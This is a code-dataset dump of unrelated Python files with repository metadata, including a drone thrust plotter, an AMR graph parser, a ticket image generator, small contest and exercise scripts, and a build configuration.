    (side effect: blocks on plt.show()).
    """
    assert abs_v.shape[0] == actions.shape[0], "mismatch length"
    # assert abs_v.shape[0] == rots.shape[0], "mismatch length"
    ## the frequency at which the data was collected
    dt = 0.01
    GRAV = 9.81
    ## diagnosis series accumulated per time step
    t2w_overtime = []
    acceleration = []
    action_sum = []
    for i in range(1, abs_v.shape[0]):
        ## calculate the velocity change
        v_diff = abs_v[i] - abs_v[i-1]
        acc = v_diff / dt
        ## calculate the normalized thrust (mean of the four motor commands)
        action = np.sum(actions[i-1]) / 4
        action_sum.append(action)
        ## rotation matrix
        # rot = np.array(rots[i]).reshape((3, 3))
        ## acceleration after compensating for gravity
        g = np.array([0., 0., -GRAV])
        acc = acc - g
        ## total acceleration in the direction of the total thrust applied
        acc = np.linalg.norm(acc)
        acceleration.append(acc)
        ## assuming thrust and action is linearly related
        t2w = acc / (action * GRAV)
        t2w_overtime.append(t2w)
    t2w_overtime = np.array(t2w_overtime)
    print(np.mean(t2w_overtime, axis=0), np.std(t2w_overtime, axis=0))
    plt.figure(0)
    # plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), t2w_overtime[:, 0], label='t2w x')
    # plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), t2w_overtime[:, 1], label='t2w y')
    plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), t2w_overtime, label='t2w z')
    plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), abs_v[1:,0], label='vx')
    plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), abs_v[1:,1], label='vy')
    plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), abs_v[1:,2], label='vz')
    plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), action_sum, label='action sum')
    plt.plot(np.linspace(1, len(t2w_overtime),len(t2w_overtime)), acceleration, label='acceleration')
    plt.legend()
    plt.show()
def main(argv):
    """
    Command-line entry point: parse arguments, load real or simulated
    flight data, and plot the thrust-to-weight estimate.

    NOTE(review): *argv* is accepted but unused -- argparse reads
    sys.argv itself.
    """
    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument(
        'real_flight_file',
        type=str,
        help='provide real flight data for training auxiliary dynamics'
    )
    parser.add_argument(
        '--sim',
        action='store_true',
        help='if it is simulation data'
    )
    args = parser.parse_args()
    # --sim selects the CSV simulation loader; otherwise decode a real log.
    if args.sim:
        abs_v, actions = load_data_sim(args.real_flight_file)
    else:
        abs_v, actions = load_data(args.real_flight_file)
    plot_t2w(abs_v, actions)
if __name__ == '__main__':
main(sys.argv) | [
"hanspal.pushpreet@gmail.com"
] | hanspal.pushpreet@gmail.com |
d3644245fbb6e118e01fef312221feff42ab5904 | 892c35f72f46f145c3f3860c1c29f1f4503ef9a6 | /solid/management/commands/solid_utils.py | bf76df8227f11afddcb1cdf4ef3e92ed3ccaa1ab | [] | no_license | pymmrd/tuangou | aaa2b857e352f75f2ba0aa024d2880a6adac21a8 | 8f6a35dde214e809cdd6cbfebd8d913bafd68fb2 | refs/heads/master | 2021-01-10T20:31:55.238764 | 2013-11-13T13:53:53 | 2013-11-13T13:53:53 | 7,911,285 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | import os
from django.conf import settings
def gen_dest_tmpl(html, tmpl, flag=None):
tmpl = tmpl.replace('dy_tags', 'tags')
sub_dir, filename = tmpl.rsplit('/', 1)
if flag:
filename = flag
tmpl_dir = os.path.join(settings.TEMPLATE_DIRS[0], sub_dir)
if not os.path.exists(tmpl_dir):
os.makedirs(tmpl_dir)
with open(os.path.join(tmpl_dir, filename), 'w') as f:
f.write(html)
| [
"zg163@zg163-Lenovo-IdeaPad-Y470.(none)"
] | zg163@zg163-Lenovo-IdeaPad-Y470.(none) |
ecd943fe32764b5d003c08d7e59fdf912e1f3c46 | fc943d383a566a7d0970829142f7c0bc2f69038c | /Digit.py | 36fc00afddf67dc7e1fe23ac93f8439d59a69f7b | [] | no_license | shivangisrivastava0408/Hackerearth_accepted_solutions | 52f84a97fa36c5d003e3563811d065e515bb4e2f | d8edb5346dd69f1090ea5af7098faefde4fdde83 | refs/heads/master | 2020-04-04T09:26:56.432975 | 2019-03-17T14:35:17 | 2019-03-17T14:35:17 | 155,818,466 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | n=raw_input()
p=0
for w in n:
p+=1
print p
| [
"noreply@github.com"
] | shivangisrivastava0408.noreply@github.com |
267c53035abe4b5d31f3e45735b277a207985313 | 83734cb05c768686b45aa1459e3d220151d60b7c | /options/base_options.py | 78e8d225ee928ac718e2d4a0f735e804e1975028 | [] | no_license | guofenggitlearning/RED-Net | b8924d477ec0e05a4da11b2b7c24e2ca0b3fae81 | e7d6159794e2f3563f1d764328eafdc0df0dc4f0 | refs/heads/master | 2020-08-15T09:50:29.447425 | 2018-07-19T03:01:04 | 2018-07-19T03:01:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,351 | py | # Xi Peng, May 2017
import argparse
import os
from utils import util
class BaseOptions():
def __init__(self):
self.parser = argparse.ArgumentParser()
self.initialized = False
def initialize(self):
self.parser.add_argument('--data_dir', type=str, default='./dataset',
help='training data or listfile path')
self.parser.add_argument('--checkpoint_dir',type=str, default='./checkpoint',
help='checkpoints are saved here')
self.parser.add_argument('--nThreads', type=int, default=4,
help='number of data loading threads')
self.parser.add_argument('--ifValidate', type=bool, default=True,
help='evaluate model on validation set')
self.parser.add_argument('--use_visdom', type=bool, default=True,
help='use visdom to display')
self.parser.add_argument('--use_html', type=bool, default=False,
help='use html to store images')
self.parser.add_argument('--display_winsize', type=int, default=256,
help='display window size') ##TO DO
self.initialized = True
def parse(self):
if not self.initialized:
self.initialize()
self.opt = self.parser.parse_args()
self.opt.isTrain = self.isTrain # train or test
self.opt.name = self.name # experiment name
#str_ids = self.opt.gpu_ids.split(',')
#self.opt.gpu_ids = []
#for str_id in str_ids:
# id = int(str_id)
# if id >= 0:
# self.opt.gpu_ids.append(id)
args = vars(self.opt)
print('------------ Options -------------')
for k, v in sorted(args.items()):
print('%s: %s' % (str(k), str(v)))
print('-------------- End ----------------')
# save to the disk
expr_dir = os.path.join(self.opt.checkpoint_dir, self.name)
util.mkdirs(expr_dir)
file_name = os.path.join(expr_dir, 'opt.txt')
with open(file_name, 'wt') as opt_file:
opt_file.write('------------ Options -------------\n')
for k, v in sorted(args.items()):
opt_file.write('%s: %s\n' % (str(k), str(v)))
opt_file.write('-------------- End ----------------\n')
return self.opt
| [
"peter.pen.ac@gmail.com"
] | peter.pen.ac@gmail.com |
e3ae61193e0a2880e6eb878f379a07f656630931 | a722faf9fb50c794555861bb4858c3ed8a7a25f3 | /contest/atcoder/abc095/D/main.py | 7f2f0044567a122b8832c3dbfb0972c08712b132 | [] | no_license | ar90n/lab | 31e5d2c320de5618bc37572011596fee8923255d | 6d035e12f743e9ba984e79bfe660967b9ca8716b | refs/heads/main | 2023-07-25T17:29:57.960915 | 2023-07-22T12:08:18 | 2023-07-22T12:08:18 | 77,883,405 | 4 | 0 | null | 2023-07-17T08:45:14 | 2017-01-03T04:15:49 | Jupyter Notebook | UTF-8 | Python | false | false | 1,428 | py | #!/usr/bin/env python3
import sys
from collections.abc import Iterable
from math import *
from itertools import *
from collections import *
from functools import *
from operator import *
try:
from math import gcd
except Exception:
from fractions import gcd
def solve(N: int, C: int, x: "List[int]", v: "List[int]"):
x = [0] + x
v = [0] + v
mx_r = [0]
for xx, acc in zip(x[1:], accumulate(v[1:], add)):
mx_r.append(max(acc - xx, mx_r[-1]))
mx_l = [0]
for xx, cal in zip(reversed(x), accumulate(reversed(v), add)):
mx_l.append(max(cal - (C - xx), mx_l[-1]))
mx_l.reverse()
ans = 0
for i in range(N+1):
ans = max(mx_r[i], mx_r[i] - x[i] + mx_l[i+1], ans)
if i != 0:
ans = max(mx_l[i], mx_l[i] - (C - x[i]) + mx_r[i-1], ans)
return ans
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
N = int(next(tokens)) # type: int
C = int(next(tokens)) # type: int
x = [int()] * (N) # type: "List[int]"
v = [int()] * (N) # type: "List[int]"
for i in range(N):
x[i] = int(next(tokens))
v[i] = int(next(tokens))
result = solve(N, C, x, v)
if isinstance(result, Iterable):
result = '\n'.join([str(v) for v in result])
print(result)
if __name__ == '__main__':
main()
| [
"argon.argon.argon@gmail.com"
] | argon.argon.argon@gmail.com |
0b576136cc62e8b69cc2c0e9b5bd5a1105ee8654 | d6d754aecc1f1dde8a168bdcd1ff85916c9b2ea5 | /backend/venv/bin/pip3.7 | 83c466b4c03cb4082166cfc8be1009c33d21cdf2 | [] | no_license | roxywilcox/CS338-COVID-19-Project-1-Team-1 | 2b30dd11211c5f5685ad9ed60e1e18d214d997cd | 7a2f23770b35ca34d5ea9598cfbd7741fb3a6928 | refs/heads/master | 2022-10-06T12:46:39.514553 | 2020-06-09T21:44:55 | 2020-06-09T21:44:55 | 261,042,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | 7 | #!/Users/aniface/northwestern/CS338/covid/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')()
)
| [
"stella.lee.lzr@gmail.com"
] | stella.lee.lzr@gmail.com |
848c1caad27107184ca3491a4c986e2c04f6352c | 82542073a6b9fa75e8c6e2c94bdea5b10edfda75 | /Only_Python/chatbot/generate_ticket.py | 563e1ff775e2d975ce4f3802e43d77a0c63bcd95 | [] | no_license | ilya-jurawlew/my_projects | a19d8f723588e77ab35fd3e2a8ba60d1f37a2036 | bdf9e6a47587e61fd98eaa94def868430023c31d | refs/heads/master | 2023-08-19T21:48:30.203953 | 2021-10-27T11:55:24 | 2021-10-27T11:55:24 | 366,669,874 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | import os
from io import BytesIO
import requests
from PIL import Image, ImageDraw, ImageFont
from cairosvg import svg2png
# Paths to the ticket template image and the font used for the text overlay.
# NOTE(review): both paths end with a trailing '/' even though they name
# files; os.path.abspath normalizes it away, but it looks accidental.
TEMPLATE_PATH = os.path.abspath('files/ticket_base.png/')
FONT_PATH = os.path.abspath('files/Roboto-Regular.ttf/')
FONT_SIZE = 20
# RGBA text color. NOTE(review): alpha is 225, not 255 -- slightly
# translucent; confirm whether full opacity was intended.
BLACK = (0, 0, 0, 225)
# Pixel offsets (x, y) on the template where the text fields are drawn.
NAME_OFFSET = (270, 125)
EMAIL_OFFSET = (280, 150)
# Avatar size (px) requested from the API, and its paste position.
AVATAR_SIZE = 150
AVATAR_OFFSET = (50, 100)
def generate_ticket(name, email):
    """
    Render a personalized ticket image and return it as a PNG in a BytesIO
    buffer (rewound to position 0), ready to be uploaded or attached.

    Draws *name* and *email* onto the template, and best-effort pastes an
    avatar fetched from the dicebear API (skipped on any non-200 response).

    Fix over the previous version: cairosvg.svg2png() returns None when a
    `write_to` target is supplied, so `Image.open(svg2png(...))` crashed
    with every successful avatar fetch; the PNG is now read back from the
    buffer it was written to.
    """
    with Image.open(TEMPLATE_PATH).convert("RGBA") as base:
        font = ImageFont.truetype(FONT_PATH, FONT_SIZE)
        draw = ImageDraw.Draw(base)
        draw.text(NAME_OFFSET, name, font=font, fill=BLACK)
        draw.text(EMAIL_OFFSET, email, font=font, fill=BLACK)
        response = requests.get(url=f'https://avatars.dicebear.com/api/male/{AVATAR_SIZE}/{email}.svg/')
        if response.status_code == 200:
            avatar_file = BytesIO()
            # svg2png writes the rasterized PNG into avatar_file and returns
            # None; rewind the buffer before handing it to PIL.
            svg2png(bytestring=response.content, write_to=avatar_file)
            avatar_file.seek(0)
            avatar = Image.open(avatar_file)
            base.paste(avatar, AVATAR_OFFSET)
        temp_file = BytesIO()
        base.save(temp_file, 'png')
        temp_file.seek(0)
        return temp_file
| [
"jurawlew@mail.ru"
] | jurawlew@mail.ru |
656ab23cb73ce77eabb15f38db88a3db0ed76209 | 7ad0e68255b0ec053a5a16fa6e6c8bee06d89902 | /amr_seq2seq/utils/amr.py | f1302a79495eddd06bb746df9e4ab25b174f78ec | [
"MIT"
] | permissive | YerevaNN/amr_seq2seq | e4333b6e9a3ea3fcdfe0a9d6233c465c8da06be4 | 7c76def8e26e06d4a8a279b5db7ae404465ec9b0 | refs/heads/master | 2020-04-24T15:49:42.193589 | 2019-02-22T15:42:16 | 2019-02-22T15:42:16 | 172,084,003 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,770 | py | # -*- coding: utf-8 -*-
# !/usr/bin/env python
"""
AMR (Abstract Meaning Representation) structure
For detailed description of AMR, see http://www.isi.edu/natural-language/amr/a.pdf
"""
from collections import defaultdict
import sys
import logging
logger = logging.getLogger('amr_postprocessing')
# change this if needed
ERROR_LOG = sys.stderr
# change this if needed
DEBUG_LOG = sys.stderr
class AMR(object):
    """
    AMR is a rooted, labeled graph to represent semantics.
    This class has the following members:
    nodes: list of node in the graph. Its ith element is the name of the ith node. For example, a node name
           could be "a1", "b", "g2", .etc
    node_values: list of node labels (values) of the graph. Its ith element is the value associated with node i in
                 nodes list. In AMR, such value is usually a semantic concept (e.g. "boy", "want-01")
    root: root node name
    relations: list of edges connecting two nodes in the graph. Each entry is a link between two nodes, i.e. a triple
               <relation name, node1 name, node 2 name>. In AMR, such link denotes the relation between two semantic
               concepts. For example, "arg0" means that one of the concepts is the 0th argument of the other.
    attributes: list of edges connecting a node to an attribute name and its value. For example, if the polarity of
                some node is negative, there should be an edge connecting this node and "-". A triple < attribute name,
                node name, attribute value> is used to represent such attribute. It can also be viewed as a relation.

    Note: relative to the previous version, all logger calls now use %-style
    placeholders so their context arguments are actually rendered (the old
    calls passed extra arguments with no format slot, which made the logging
    module raise a formatting error instead of printing the context; one
    message also used "{v}" without an f-prefix and was never interpolated).
    """
    def __init__(self, node_list=None, node_value_list=None, relation_list=None, attribute_list=None):
        """
        node_list: names of nodes in AMR graph, e.g. "a11", "n"
        node_value_list: values of nodes in AMR graph, e.g. "group" for a node named "g"
        relation_list: list of relations between two nodes
        attribute_list: list of attributes (links between one node and one constant value)
        """
        # initialize AMR graph nodes using list of nodes name
        # root, by default, is the first in var_list
        if node_list is None:
            self.nodes = []
            self.root = None
        else:
            self.nodes = node_list[:]
            if len(node_list) != 0:
                self.root = node_list[0]
            else:
                self.root = None
        if node_value_list is None:
            self.node_values = []
        else:
            self.node_values = node_value_list[:]
        if relation_list is None:
            self.relations = []
        else:
            self.relations = relation_list[:]
        if attribute_list is None:
            self.attributes = []
        else:
            self.attributes = attribute_list[:]

    def rename_node(self, prefix):
        """
        Rename AMR graph nodes to prefix + node_index to avoid nodes with the same name in two different AMRs.
        """
        node_map_dict = {}
        # map each node to its new name (e.g. "a1")
        for i in range(0, len(self.nodes)):
            node_map_dict[self.nodes[i]] = prefix + str(i)
        # update node name
        for i, v in enumerate(self.nodes):
            self.nodes[i] = node_map_dict[v]
        # update node name in relations
        for i, d in enumerate(self.relations):
            new_dict = {}
            for k, v in d.items():
                new_dict[node_map_dict[k]] = v
            self.relations[i] = new_dict

    def get_triples(self):
        """
        Get the triples in three lists.
        instance_triple: a triple representing an instance. E.g. instance(w, want-01)
        attribute triple: relation of attributes, e.g. polarity(w, - )
        and relation triple, e.g. arg0 (w, b)
        """
        instance_triple = []
        relation_triple = []
        attribute_triple = []
        for i in range(len(self.nodes)):
            instance_triple.append(("instance", self.nodes[i], self.node_values[i]))
            # k is the other node this node has relation with
            # v is relation name
            for k, v in self.relations[i].items():
                relation_triple.append((v, self.nodes[i], k))
            # k2 is the attribute name
            # v2 is the attribute value
            for k2, v2 in self.attributes[i].items():
                attribute_triple.append((k2, self.nodes[i], v2))
        return instance_triple, attribute_triple, relation_triple

    def get_triples2(self):
        """
        Get the triples in two lists:
        instance_triple: a triple representing an instance. E.g. instance(w, want-01)
        relation_triple: a triple representing all relations. E.g arg0 (w, b) or E.g. polarity(w, - )
        Note that we do not differentiate between attribute triple and relation triple. Both are considered as relation
        triples.
        All triples are represented by (triple_type, argument 1 of the triple, argument 2 of the triple)
        """
        instance_triple = []
        relation_triple = []
        for i in range(len(self.nodes)):
            # an instance triple is instance(node name, node value).
            # For example, instance(b, boy).
            instance_triple.append(("instance", self.nodes[i], self.node_values[i]))
            # k is the other node this node has relation with
            # v is relation name
            for k, v in self.relations[i].items():
                relation_triple.append((v, self.nodes[i], k))
            # k2 is the attribute name
            # v2 is the attribute value
            for k2, v2 in self.attributes[i].items():
                relation_triple.append((k2, self.nodes[i], v2))
        return instance_triple, relation_triple

    def __str__(self):
        """
        Generate AMR string for better readability
        """
        lines = []
        for i in range(len(self.nodes)):
            lines.append("Node " + str(i) + " " + self.nodes[i])
            lines.append("Value: " + self.node_values[i])
            lines.append("Relations:")
            for k, v in self.relations[i].items():
                lines.append("Node " + k + " via " + v)
            for k2, v2 in self.attributes[i].items():
                lines.append("Attribute: " + k2 + " value " + v2)
        return "\n".join(lines)

    def __repr__(self):
        return self.__str__()

    def output_amr(self):
        """
        Output AMR string
        """
        logger.info(self.__str__())

    @staticmethod
    def parse_AMR_line(line):
        """
        Parse a AMR from line representation to an AMR object.
        This parsing algorithm scans the line once and process each character, in a shift-reduce style.
        Returns the parsed AMR, or None if the line is malformed.
        """
        # Current state. It denotes the last significant symbol encountered. 1 for (, 2 for :, 3 for /,
        # and 0 for start state or ')'
        # Last significant symbol is ( --- start processing node name
        # Last significant symbol is : --- start processing relation name
        # Last significant symbol is / --- start processing node value (concept name)
        # Last significant symbol is ) --- current node processing is complete
        # Note that if these symbols are inside parenthesis, they are not significant symbols.
        state = 0
        # node stack for parsing
        stack = []
        # current not-yet-reduced character sequence
        cur_charseq = []
        # key: node name value: node value
        node_dict = {}
        # node name list (order: occurrence of the node)
        node_name_list = []
        # key: node name: value: list of (relation name, the other node name)
        node_relation_dict1 = defaultdict(list)
        # key: node name, value: list of (attribute name, const value) or (relation name, unseen node name)
        node_relation_dict2 = defaultdict(list)
        # current relation name
        cur_relation_name = ""
        # having unmatched quote string
        in_quote = False
        for i, c in enumerate(line.strip()):
            if c == " ":
                # allow space in relation name
                if state == 2:
                    cur_charseq.append(c)
                continue
            if c == "\"":
                # flip in_quote value when a quote symbol is encountered
                # insert placeholder if in_quote from last symbol
                if in_quote:
                    cur_charseq.append('_')
                in_quote = not in_quote
            elif c == "(":
                # not significant symbol if inside quote
                if in_quote:
                    cur_charseq.append(c)
                    continue
                # get the attribute name
                # e.g :arg0 (x ...
                # at this point we get "arg0"
                if state == 2:
                    # in this state, current relation name should be empty
                    if cur_relation_name != "":
                        logger.error("Format error when processing %s", line[0:i + 1])
                        return None
                    # update current relation name for future use
                    cur_relation_name = "".join(cur_charseq).strip()
                    cur_charseq[:] = []
                state = 1
            elif c == ":":
                # not significant symbol if inside quote
                if in_quote:
                    cur_charseq.append(c)
                    continue
                # Last significant symbol is "/". Now we encounter ":"
                # Example:
                # :OR (o2 / *OR*
                #    :mod (o3 / official)
                # gets node value "*OR*" at this point
                if state == 3:
                    node_value = "".join(cur_charseq)
                    # clear current char sequence
                    cur_charseq[:] = []
                    # pop node name ("o2" in the above example)
                    cur_node_name = stack[-1]
                    # update node name/value map
                    node_dict[cur_node_name] = node_value
                # Last significant symbol is ":". Now we encounter ":"
                # Example:
                # :op1 w :quant 30
                # or :day 14 :month 3
                # the problem is that we cannot decide if node value is attribute value (constant)
                # or node value (variable) at this moment
                elif state == 2:
                    temp_attr_value = "".join(cur_charseq)
                    cur_charseq[:] = []
                    parts = temp_attr_value.split()
                    if len(parts) < 2:
                        logger.error("Error in processing; part len < 2 %s", line[0:i + 1])
                        return None
                    # For the above example, node name is "op1", and node value is "w"
                    # Note that this node name might not be encountered before
                    relation_name = parts[0].strip()
                    relation_value = parts[1].strip()
                    # We need to link upper level node to the current
                    # top of stack is upper level node
                    if len(stack) == 0:
                        logger.error("Error in processing %s %s %s", line[:i], relation_name, relation_value)
                        return None
                    # if we have not seen this node name before
                    if relation_value not in node_dict:
                        node_relation_dict2[stack[-1]].append((relation_name, relation_value))
                    else:
                        node_relation_dict1[stack[-1]].append((relation_name, relation_value))
                state = 2
            elif c == "/":
                if in_quote:
                    cur_charseq.append(c)
                    continue
                # Last significant symbol is "(". Now we encounter "/"
                # Example:
                # (d / default-01
                # get "d" here
                if state == 1:
                    node_name = "".join(cur_charseq)
                    cur_charseq[:] = []
                    # if this node name is already in node_dict, it is duplicate
                    if node_name in node_dict:
                        logger.error("Duplicate node name %s in parsing AMR", node_name)
                        return None
                    # push the node name to stack
                    stack.append(node_name)
                    # add it to node name list
                    node_name_list.append(node_name)
                    # if this node is part of the relation
                    # Example:
                    # :arg1 (n / nation)
                    # cur_relation_name is arg1
                    # node name is n
                    # we have a relation arg1(upper level node, n)
                    if cur_relation_name != "":
                        # if relation name ends with "-of", e.g."arg0-of",
                        # it is reverse of some relation. For example, if a is "arg0-of" b,
                        # we can also say b is "arg0" a.
                        # If the relation name ends with "-of", we store the reverse relation.
                        if not cur_relation_name.endswith("-of"):
                            # stack[-2] is upper_level node we encountered, as we just add node_name to stack
                            node_relation_dict1[stack[-2]].append((cur_relation_name, node_name))
                        else:
                            # cur_relation_name[:-3] is to delete "-of"
                            node_relation_dict1[node_name].append((cur_relation_name[:-3], stack[-2]))
                        # clear current_relation_name
                        cur_relation_name = ""
                else:
                    # error if in other state
                    logger.error("Error in parsing AMR %s", line[0:i + 1])
                    return None
                state = 3
            elif c == ")":
                if in_quote:
                    cur_charseq.append(c)
                    continue
                # stack should be non-empty to find upper level node
                if len(stack) == 0:
                    logger.error("Unmatched parenthesis at position %s in processing %s", i, line[0:i + 1])
                    return None
                # Last significant symbol is ":". Now we encounter ")"
                # Example:
                # :op2 "Brown") or :op2 w)
                # get \"Brown\" or w here
                if state == 2:
                    temp_attr_value = "".join(cur_charseq)
                    cur_charseq[:] = []
                    parts = temp_attr_value.split()
                    if len(parts) < 2:
                        logger.error("Error processing %s %s", line[:i + 1], temp_attr_value)
                        return None
                    relation_name = parts[0].strip()
                    relation_value = parts[1].strip()
                    # store reverse of the relation
                    # we are sure relation_value is a node here, as "-of" relation is only between two nodes
                    if relation_name.endswith("-of"):
                        node_relation_dict1[relation_value].append((relation_name[:-3], stack[-1]))
                    # attribute value not seen before
                    # Note that it might be a constant attribute value, or an unseen node
                    # process this after we have seen all the node names
                    elif relation_value not in node_dict:
                        node_relation_dict2[stack[-1]].append((relation_name, relation_value))
                    else:
                        node_relation_dict1[stack[-1]].append((relation_name, relation_value))
                # Last significant symbol is "/". Now we encounter ")"
                # Example:
                # :arg1 (n / nation)
                # we get "nation" here
                elif state == 3:
                    node_value = "".join(cur_charseq)
                    cur_charseq[:] = []
                    cur_node_name = stack[-1]
                    # map node name to its value
                    node_dict[cur_node_name] = node_value
                # pop from stack, as the current node has been processed
                stack.pop()
                cur_relation_name = ""
                state = 0
            else:
                # not significant symbols, so we just shift.
                cur_charseq.append(c)
        # create data structures to initialize an AMR
        node_value_list = []
        relation_list = []
        attribute_list = []
        for v in node_name_list:
            if v not in node_dict:
                # placeholder fixed: the old message was "{v}" without an
                # f-prefix, so the node name was never shown.
                logger.error("Error: Node name not found %s", v)
                return None
            else:
                node_value_list.append(node_dict[v])
            # build relation map and attribute map for this node
            relation_dict = {}
            attribute_dict = {}
            if v in node_relation_dict1:
                for v1 in node_relation_dict1[v]:
                    relation_dict[v1[1]] = v1[0]
            if v in node_relation_dict2:
                for v2 in node_relation_dict2[v]:
                    # if value is in quote, it is a constant value
                    # strip the quote and put it in attribute map
                    if v2[1][0] == "\"" and v2[1][-1] == "\"":
                        attribute_dict[v2[0]] = v2[1][1:-1]
                    # if value is a node name
                    elif v2[1] in node_dict:
                        relation_dict[v2[1]] = v2[0]
                    else:
                        attribute_dict[v2[0]] = v2[1]
            # each node has a relation map and attribute map
            relation_list.append(relation_dict)
            attribute_list.append(attribute_dict)
        # add TOP as an attribute. The attribute value is the top node value
        attribute_list[0]["TOP"] = node_value_list[0]
        result_amr = AMR(node_name_list, node_value_list, relation_list, attribute_list)
        return result_amr
# test AMR parsing
# a unittest can also be used.
if __name__ == "__main__":
    # Smoke test: parse each non-comment line of the given file as an AMR.
    if len(sys.argv) < 2:
        logger.error("No file given")
        exit(1)
    amr_count = 1
    with open(sys.argv[1]) as amr_file:
        for line in amr_file:
            cur_line = line.strip()
            # Skip blank lines and '#' comment lines.
            if cur_line == "" or cur_line.startswith("#"):
                continue
            # %-placeholder added so the counter is actually rendered.
            logger.info("AMR %d", amr_count)
            current = AMR.parse_AMR_line(cur_line)
            # parse_AMR_line returns None on malformed input; the old code
            # called output_amr() unconditionally and crashed in that case.
            if current is not None:
                current.output_amr()
amr_count += 1
| [
"mahnerak@gmail.com"
] | mahnerak@gmail.com |
4c7fa45bccdd601c393212979c83c051cf06b4bd | e045b8b682eb2935deaf9b607d327665430a35d0 | /Basic Programs/electricitybill.py | ceee7f738cae51c46c0f3f2996116935e8526ab1 | [] | no_license | surendhar-code/Python-Programs | bf97a58db94eed9a6a133b0a6eb50ece6428bc96 | cd8116f2b3beb07e84ae7445895f8a94f14d1977 | refs/heads/main | 2023-05-09T21:22:29.155906 | 2021-06-01T04:17:11 | 2021-06-01T04:17:11 | 343,982,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | units = int(input("Enter the units consumed : "))
if units <= 100:
amount = units*3.00
elif units <=200:
amount = 3.25*units
elif units <= 500:
amount = 700.00 + 4.60 * (units - 200)
else:
amount = 2080.00 + 6.60 * (units - 500)
print("Units = ",units, " Amount : ",amount) | [
"65447707+surendhar-code@users.noreply.github.com"
] | 65447707+surendhar-code@users.noreply.github.com |
7d78d5177729f5f665749df5e38b164a5b32171a | f7a06c4b919c4ced76f260602c3835bda4c9180e | /config.py | 081924999b26c51c97ed6fc3eaff0391afa72210 | [
"LicenseRef-scancode-us-govt-public-domain",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | eelcovv/proteus | d060c7afcde4a24b119c01f507aaaacc6584314a | 80c4310d2fa43be2c70fe73914425134debd0139 | refs/heads/master | 2021-01-17T22:41:37.863572 | 2015-02-11T23:13:25 | 2015-02-11T23:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,162 | py | import os
from os.path import join as pjoin
import sys
# Install prefix: honor $PROTEUS_PREFIX when set; otherwise fall back to
# the prefix of the running Python interpreter.
prefix = os.getenv('PROTEUS_PREFIX')
if not prefix:
    prefix = sys.exec_prefix
PROTEUS_INCLUDE_DIR = pjoin(prefix, 'include')
PROTEUS_LIB_DIR = pjoin(prefix, 'lib')
# Platform-specific build settings; overridden per sys.platform below.
platform_extra_compile_args = []
platform_extra_link_args = []
platform_blas_h = None
platform_lapack_h = None
platform_lapack_integer = None
# Platform-specific BLAS/LAPACK headers and linker flags.
if sys.platform == 'darwin':
    # macOS: use the Accelerate framework's vecLib headers.
    platform_extra_link_args = ['-framework', 'Accelerate']
    platform_lapack_integer = '__CLPK_integer'
    platform_blas_h = r'<veclib/cblas.h>'
    platform_lapack_h = r'<veclib/clapack.h>'
elif sys.platform.startswith('linux'):
    # startswith() is used because Python 2 reported 'linux2' (or 'linux3')
    # while Python 3 reports 'linux'; the previous exact 'linux2' comparison
    # never matched on Python 3, skipping the Linux configuration entirely.
    platform_extra_compile_args = ['-DPETSC_INCLUDE_AS_C']
    platform_extra_link_args = ['-Wl,-rpath,' + PROTEUS_LIB_DIR]
    platform_blas_h = r'"proteus_blas.h"'
    platform_lapack_h = r'"proteus_lapack.h"'
# Common C compile flags plus whatever the platform branch added.
PROTEUS_EXTRA_COMPILE_ARGS= ['-Wall',
                             '-DF77_POST_UNDERSCORE',
                             '-DUSE_BLAS',
                             '-DCMRVEC_BOUNDS_CHECK',
                             '-DMV_VECTOR_BOUNDS_CHECK'] + platform_extra_compile_args
def get_flags(package):
    """Resolve the include/lib directories for *package*.

    If the environment defines <PACKAGE>_DIR, return the pair
    (<PACKAGE>_DIR/include, <PACKAGE>_DIR/lib); otherwise fall back to the
    Proteus-wide defaults.  This lets individual dependencies be supplied
    through environment variables at build time.
    """
    root = os.getenv('%s_DIR' % package.upper())
    if not root:
        return PROTEUS_INCLUDE_DIR, PROTEUS_LIB_DIR
    return pjoin(root, 'include'), pjoin(root, 'lib')
# Link flags shared by every extension; FC_* variants are for Fortran code.
PROTEUS_EXTRA_LINK_ARGS=['-lblas'] + platform_extra_link_args
PROTEUS_EXTRA_FC_COMPILE_ARGS= ['-Wall']
PROTEUS_EXTRA_FC_LINK_ARGS=['-lblas']
# SuperLU settings (overridable via SUPERLU_DIR).
PROTEUS_SUPERLU_INCLUDE_DIR, PROTEUS_SUPERLU_LIB_DIR = get_flags('superlu')
PROTEUS_SUPERLU_H = r'"slu_ddefs.h"'
PROTEUS_SUPERLU_LIB = 'superlu_4.1'
# BLAS: use the platform-specific header when one was chosen above.
PROTEUS_BLAS_INCLUDE_DIR = '.'
if platform_blas_h:
    PROTEUS_BLAS_H = platform_blas_h
else:
    PROTEUS_BLAS_H = r'"cblas.h"'
PROTEUS_BLAS_LIB_DIR = '.'
PROTEUS_BLAS_LIB = 'blas'
# LAPACK: same pattern as BLAS, including the integer type for CLAPACK calls.
PROTEUS_LAPACK_INCLUDE_DIR = '.'
